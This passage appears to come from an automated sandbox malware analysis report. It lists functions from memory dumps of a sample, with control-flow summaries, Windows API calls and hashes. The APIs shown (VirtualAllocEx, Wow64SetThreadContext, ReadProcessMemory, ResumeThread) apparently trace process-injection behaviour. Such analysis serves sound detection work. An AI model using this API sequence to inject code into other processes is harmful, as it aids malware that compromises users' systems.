                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0266D5B6,?,?,?,?,?), ref: 0266D677
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 46fdb124397ed739f8ac176cd7dab3e849c32366909d1a460cbf96d76752cde1
                                                                              • Instruction ID: 6082ffec2f322a63f04abac0f5e47a8fc43fc13d890464189ac55c16589ce7cd
                                                                              • Opcode Fuzzy Hash: 46fdb124397ed739f8ac176cd7dab3e849c32366909d1a460cbf96d76752cde1
                                                                              • Instruction Fuzzy Hash: 2E21E4B5900349AFDB10CFAAD584BEEFBF4EB48314F14801AE919A7350D378A944CFA4
                                                                              Function 0266D5E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 243 266d5e8-266d684 DuplicateHandle 244 266d686-266d68c 243->244 245 266d68d-266d6aa 243->245 244->245
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0266D5B6,?,?,?,?,?), ref: 0266D677
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: acf9682bd52575d0acd98d73457910d1b5eb6070cd6596e4c0b1efac958850f0
                                                                              • Instruction ID: 8f646e36a06313e3298bfd8bc8ba7bdf27a9a8ea336420f0c29a7e9b7c63ba92
                                                                              • Opcode Fuzzy Hash: acf9682bd52575d0acd98d73457910d1b5eb6070cd6596e4c0b1efac958850f0
                                                                              • Instruction Fuzzy Hash: 1C21E4B5D00308DFDB10CFAAD584AEEBBF5EB48314F24801AE918A7350C378A945CFA4
                                                                              Function 06BA72F0 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 248 6ba72f0-6ba7343 250 6ba7353-6ba7383 Wow64SetThreadContext 248->250 251 6ba7345-6ba7351 248->251 253 6ba738c-6ba73bc 250->253 254 6ba7385-6ba738b 250->254 251->250 254->253
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BA7376
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 7a58c6d3cd4528b32b12af3ca0238a70299886d4b993a9eb94e93f06b266c3fc
                                                                              • Instruction ID: 0bfb277d365a95b0ac79e3d326ae06e06711fe27e50674ab93d9565845a7fb09
                                                                              • Opcode Fuzzy Hash: 7a58c6d3cd4528b32b12af3ca0238a70299886d4b993a9eb94e93f06b266c3fc
                                                                              • Instruction Fuzzy Hash: B82149B6D043098FDB24DFAAC4847EEBBF5EF48314F14842AD859A7240CB789945CFA5
                                                                              Function 06BA79B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 258 6ba79b0-6ba7a45 ReadProcessMemory 261 6ba7a4e-6ba7a7e 258->261 262 6ba7a47-6ba7a4d 258->262 262->261
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BA7A38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 7634c497db12a3e7fe30f8b9adc94847ced203dd8b1357df1e2e2c1db9567423
                                                                              • Instruction ID: b116c2f442a832f7afcac6ad97e113546bd644db6bf36cceb667c77b26255c90
                                                                              • Opcode Fuzzy Hash: 7634c497db12a3e7fe30f8b9adc94847ced203dd8b1357df1e2e2c1db9567423
                                                                              • Instruction Fuzzy Hash: CF214CB1C043099FDB10CF9AC8807DEBBF1FF48310F508429E519A7240C7759541CBA0
                                                                              Function 06BA72F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 266 6ba72f8-6ba7343 268 6ba7353-6ba7383 Wow64SetThreadContext 266->268 269 6ba7345-6ba7351 266->269 271 6ba738c-6ba73bc 268->271 272 6ba7385-6ba738b 268->272 269->268 272->271
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BA7376
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 41c8ee12c14ec5553df5dcd132aaae7dfba110429c48a0fa76a81d317da50733
                                                                              • Instruction ID: 25b058be730e0b67ff899edce6f3f5556a80b3c151eaa225dd62dcaa0f7f76af
                                                                              • Opcode Fuzzy Hash: 41c8ee12c14ec5553df5dcd132aaae7dfba110429c48a0fa76a81d317da50733
                                                                              • Instruction Fuzzy Hash: 49215BB6D043098FDB20DFAAC4847EEBBF5EF48314F14842AD859A7240CB789945CFA4
                                                                              Function 06BA79B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 276 6ba79b8-6ba7a45 ReadProcessMemory 279 6ba7a4e-6ba7a7e 276->279 280 6ba7a47-6ba7a4d 276->280 280->279
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BA7A38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 249a9cd9dccc0a7c137ff9fdc88b45078d0b8a8dde83c2f97cf7b80c0ff1b6ab
                                                                              • Instruction ID: 5ac1c30ff5233312c11b73c1d582cb9ebebe09a95bccf905ab395def2c256a3a
                                                                              • Opcode Fuzzy Hash: 249a9cd9dccc0a7c137ff9fdc88b45078d0b8a8dde83c2f97cf7b80c0ff1b6ab
                                                                              • Instruction Fuzzy Hash: E92125B5C043599FDB10DFAAC880BEEBBF5FF48310F50842AE919A7240C7799945CBA4
                                                                              Function 06BA7800 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 284 6ba7800-6ba7883 VirtualAllocEx 287 6ba788c-6ba78b1 284->287 288 6ba7885-6ba788b 284->288 288->287
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BA7876
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: ff971889db82cddb5d9ede58736fde310f367fbbecab5d003740e76ef7432070
                                                                              • Instruction ID: 25184f5e882dca82000c34d98a353928be43da5be853fe6a6af4d3e68b00ff26
                                                                              • Opcode Fuzzy Hash: ff971889db82cddb5d9ede58736fde310f367fbbecab5d003740e76ef7432070
                                                                              • Instruction Fuzzy Hash: 78115976D043088FDB24DFAAD844BDEBBF5EF48310F148429E519A7250CB759944CFA0
                                                                              Function 06BA7808 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 292 6ba7808-6ba7883 VirtualAllocEx 295 6ba788c-6ba78b1 292->295 296 6ba7885-6ba788b 292->296 296->295
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BA7876
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 6f56d5d6ac9b1ad26e77b9fd9e686ee4868fe86aa203ce16934ad5a0665b336d
                                                                              • Instruction ID: e1f64faea22ec26d0debff95b5fd558ea225e5732197352ee92fac82c3e8d2a8
                                                                              • Opcode Fuzzy Hash: 6f56d5d6ac9b1ad26e77b9fd9e686ee4868fe86aa203ce16934ad5a0665b336d
                                                                              • Instruction Fuzzy Hash: C6115676D043088FDB20DFAAC844BDEBBF5EF48320F24842AE515A7250CB75A940CBA0
                                                                              Function 06BA6E10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: cb428211dd08c3e95bb41beb46d4614e820427d02b6d83788e8e49272101e5df
                                                                              • Instruction ID: 9d754fdd73062fe5f4d173f4710fd441db290a6b19cc41cfc88d0f1a53814b06
                                                                              • Opcode Fuzzy Hash: cb428211dd08c3e95bb41beb46d4614e820427d02b6d83788e8e49272101e5df
                                                                              • Instruction Fuzzy Hash: AF113AB1D043488FDB24DFAAC8447DFFBF5EF88224F24841AD419A7240C7796945CBA4
                                                                              Function 06BA6E08 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 89704389bc1322d16b9097e2f53f34e88ec84203292c742a6cb241e2abc1298c
                                                                              • Instruction ID: 5fecf835333a6e961905d231159c3dfa3f1e74c53b4fa0a4cb42b0a9de7aa070
                                                                              • Opcode Fuzzy Hash: 89704389bc1322d16b9097e2f53f34e88ec84203292c742a6cb241e2abc1298c
                                                                              • Instruction Fuzzy Hash: A21136B2D04349CFDB24DFAAC8447EEFBF5EF48224F24841AD419A7240D7796945CBA4
                                                                              Function 0266AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0266AF5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 1b7cbd6ebf2895c241032a49b9a9a7129ee4502bf93ddbd71b5c5f4491451efc
                                                                              • Instruction ID: 5a3978a091185efac4269c9a898627c407bbac352a17f3ebf14090193bb2a283
                                                                              • Opcode Fuzzy Hash: 1b7cbd6ebf2895c241032a49b9a9a7129ee4502bf93ddbd71b5c5f4491451efc
                                                                              • Instruction Fuzzy Hash: 4911DFB6D002498FDB20CF9AD544BDEFBF4EB88214F14846AD829B7210C379A545CFA5
                                                                              Function 06BA4370 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BA9DDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: e7d77305b391e08541300f70c1bb1c82800d661be5d2b1e30e236ce0e25908e0
                                                                              • Instruction ID: 5d8847de0c2ee60a4cbd4546c3fa8100332e160af57342ddaa81de64d5b04b26
                                                                              • Opcode Fuzzy Hash: e7d77305b391e08541300f70c1bb1c82800d661be5d2b1e30e236ce0e25908e0
                                                                              • Instruction Fuzzy Hash: C91106B58043499FDB10DF9AD485BDEFBF8EB48314F10845AE955A7200C375A984CFA5
                                                                              Function 06BA9D78 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BA9DDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 48f6aa9421c0c57bd51a40ebd012212ccc171e69da18b0edd29c7b8c0c801e37
                                                                              • Instruction ID: 2d960730e93f48c936a2afb5e85b7da0c8ab7b4f4594cd14ceaf8652748e84a4
                                                                              • Opcode Fuzzy Hash: 48f6aa9421c0c57bd51a40ebd012212ccc171e69da18b0edd29c7b8c0c801e37
                                                                              • Instruction Fuzzy Hash: BB11F2B58043499FDB10DF9AD485BDEFFF8EB48314F20845AE568A7240C375A984CFA5
                                                                              Function 06BAA8B8 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BAB369,?,?), ref: 06BAB510
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 3ad212d7b1023a0afafe82202fbbe0bb91d077218a86248bede8c7552d754193
                                                                              • Instruction ID: 37a28d6bd6879540af9d156dc5eee56b645443ea920ea09091ea2fd4839dc687
                                                                              • Opcode Fuzzy Hash: 3ad212d7b1023a0afafe82202fbbe0bb91d077218a86248bede8c7552d754193
                                                                              • Instruction Fuzzy Hash: E51136B68043498FDB20DF9AD444BEEBBF4EB48320F14845AD969A7340D379A944CFA5
                                                                              Function 06BAB4B2 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BAB369,?,?), ref: 06BAB510
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 6199457c82c6587a449ca587148e9767f316b75877cf8e991d1cc14fa6184933
                                                                              • Instruction ID: e3b14ad60fa523fb776109a18f5170feaebc23f9fe0d64ff2fd101a76e56a74a
                                                                              • Opcode Fuzzy Hash: 6199457c82c6587a449ca587148e9767f316b75877cf8e991d1cc14fa6184933
                                                                              • Instruction Fuzzy Hash: 7E1125B68043498FDB24DF9AD444BEEBBF0EB48320F14845AD569A7240C339A584CFA5
                                                                              Function 00C2D4C4 Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302837392.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c2d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3cd6c35a9421d7af38944c2dd87596739b8fece3f1f5d9c4f7f2c58bab184872
                                                                              • Instruction ID: ac2c238b615065593e50008df855718612b402750e70167f9f907929dfeff668
                                                                              • Opcode Fuzzy Hash: 3cd6c35a9421d7af38944c2dd87596739b8fece3f1f5d9c4f7f2c58bab184872
                                                                              • Instruction Fuzzy Hash: 062148B1504240DFDB05DF14E8C0B26BF61FBA4318F34C579E8060B646C376D946CBA2
                                                                              Function 00C3D1D4 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302908498.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c3d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0797b6e7a016a87f35191ebe4bf37dff48393bae93d2735473ed6ce3ad19e7f4
                                                                              • Instruction ID: 538184849d8f8160de496b2dea82b29f2ae2beecc90469287944fe2c87ae340f
                                                                              • Opcode Fuzzy Hash: 0797b6e7a016a87f35191ebe4bf37dff48393bae93d2735473ed6ce3ad19e7f4
                                                                              • Instruction Fuzzy Hash: 6C21F2B1514204EFDB15DF10E9C0B26BBA5FB84314F24C5ADE84A4B296C377DC46CA61
                                                                              Function 00C3D01C Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302908498.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c3d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 97ca99d344226dd73e2e48e57863f553a3d70e1d3c14c83b84f4949f12fdb4b9
                                                                              • Instruction ID: 7ae09ccfecbd0ebcf0978420835fdd48c01a2634e8fb33c661a128feca23c4b2
                                                                              • Opcode Fuzzy Hash: 97ca99d344226dd73e2e48e57863f553a3d70e1d3c14c83b84f4949f12fdb4b9
                                                                              • Instruction Fuzzy Hash: 482122B1604300DFDB18DF20E9C0B26BBA5FB84714F24C56DE84B0B286C33AD847CA62
                                                                              Function 00C3D005 Relevance: .1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302908498.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c3d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8a9c75af66b5b4aa0b80b5770139a1ed2550fdbdf0932c2e0aca7ef3d5948681
                                                                              • Instruction ID: f41a7aaaf6a1bdb1481f31d8fa127ec516e90349839771366197e801f754300f
                                                                              • Opcode Fuzzy Hash: 8a9c75af66b5b4aa0b80b5770139a1ed2550fdbdf0932c2e0aca7ef3d5948681
                                                                              • Instruction Fuzzy Hash: 912180755093808FCB16CF24D990715BF71EB46314F28C5EAD8498F6A7C33A990ACB62
                                                                              Function 00C2D4BF Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302837392.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c2d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                              • Instruction ID: cbaa623464ca8830ce7579a0ee84dfe775bd650d5486d5317f0ab9217a26415a
                                                                              • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                                                              • Instruction Fuzzy Hash: 2C11D3B6504280CFDB16CF10D5C4B16BF71FB94314F24C6A9D84A4B656C33AD956CBA1
                                                                              Function 00C3D1CF Relevance: .1, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302908498.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c3d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                              • Instruction ID: 6f55cef1069585043308e2addee87ebd20b629b55879363dc1272974dd0ce37e
                                                                              • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                              • Instruction Fuzzy Hash: D7118B75504280DFDB16CF10D5C4B16BBB1FB84314F28C6AAD84A4B696C33BD95ACB61
                                                                              Function 00C2D759 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302837392.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c2d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0080af57a714943e3751c1a3c36257d30c36bb048bf70d06e721ae49dab81088
                                                                              • Instruction ID: fe7a239f7a6807efb7ce8a7685ccb9c497ca9c5a3f2fe29726aacc2a337c9e44
                                                                              • Opcode Fuzzy Hash: 0080af57a714943e3751c1a3c36257d30c36bb048bf70d06e721ae49dab81088
                                                                              • Instruction Fuzzy Hash: 1001D0715043509FE7108A16EC84767FB98DF51724F18C456ED1B4B68AC37D9940D671
                                                                              Function 00C2D758 Relevance: .0, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1302837392.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_c2d000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: de38ad5620984b7c45ba228343f181519e5a9f0b50acc8149efc095ae99b8445
                                                                              • Instruction ID: a6471ed7167298b5fe8abc1605a59590ab203d9103916c900dcfe7ec03e539fb
                                                                              • Opcode Fuzzy Hash: de38ad5620984b7c45ba228343f181519e5a9f0b50acc8149efc095ae99b8445
                                                                              • Instruction Fuzzy Hash: 3AF0C2714043409EE7208A16EC84B62FBA8EF51724F18C45AED190F68AC3799844CAB1

                                                                              Non-executed Functions

                                                                              Function 06BA4EB0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: {xtp
                                                                              • API String ID: 0-3704491175
                                                                              • Opcode ID: a309ceed3936c64fa09854979a14566aff6861d5186b5d4bf311431c24cf65d0
                                                                              • Instruction ID: 402a662ea7e1ed30f0021de7aa513f8d681d05535a2c931a1ac8751bf4f915a6
                                                                              • Opcode Fuzzy Hash: a309ceed3936c64fa09854979a14566aff6861d5186b5d4bf311431c24cf65d0
                                                                              • Instruction Fuzzy Hash: EAE10BB4E142198FDB54DFA9C580AAEFBF2FF89304F2481A9D414AB355D731A941CFA0
                                                                              Function 06BA6EC0 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f7c7d686c0dd4f22ebad399d36632cc0eabe34d0333ad7e962a64c78cca37139
                                                                              • Instruction ID: c80becb20ad190686d54380ca7a4f4fe6f55cbe1d4f16feb8f5b282124c3b98f
                                                                              • Opcode Fuzzy Hash: f7c7d686c0dd4f22ebad399d36632cc0eabe34d0333ad7e962a64c78cca37139
                                                                              • Instruction Fuzzy Hash: E2E1EBB4E142198FDB54DFA9C580AAEFBF2FF89304F2481A9D414AB355DB31A941CF60
                                                                              Function 06BA65E8 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c1d2c848bd2d35a49b737542766a31328f5fc995baec28c4ee794df5b497f7fe
                                                                              • Instruction ID: c76ce96e903227c67bfa87db5bd75af3cb5775bfc2fcd4c292e916807bd41c05
                                                                              • Opcode Fuzzy Hash: c1d2c848bd2d35a49b737542766a31328f5fc995baec28c4ee794df5b497f7fe
                                                                              • Instruction Fuzzy Hash: 35E10AB4E142198FDB14DFA9C580AAEFBF6FF89304F2481A9D415AB355D730A941CFA0
                                                                              Function 06BA52E8 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2eb6ad5fb035dce16c266b839ca3f41ea8e612d5c3c286ceb5fa99d1ac70683a
                                                                              • Instruction ID: 8562ab7712448a15d22c52e89af17341866e89ee8aff11e329312c6b5efb6ec7
                                                                              • Opcode Fuzzy Hash: 2eb6ad5fb035dce16c266b839ca3f41ea8e612d5c3c286ceb5fa99d1ac70683a
                                                                              • Instruction Fuzzy Hash: 86E10CB5E142198FDB14DFA9C580AAEFBF2FF89304F2481A9D414AB359D730A941CF60
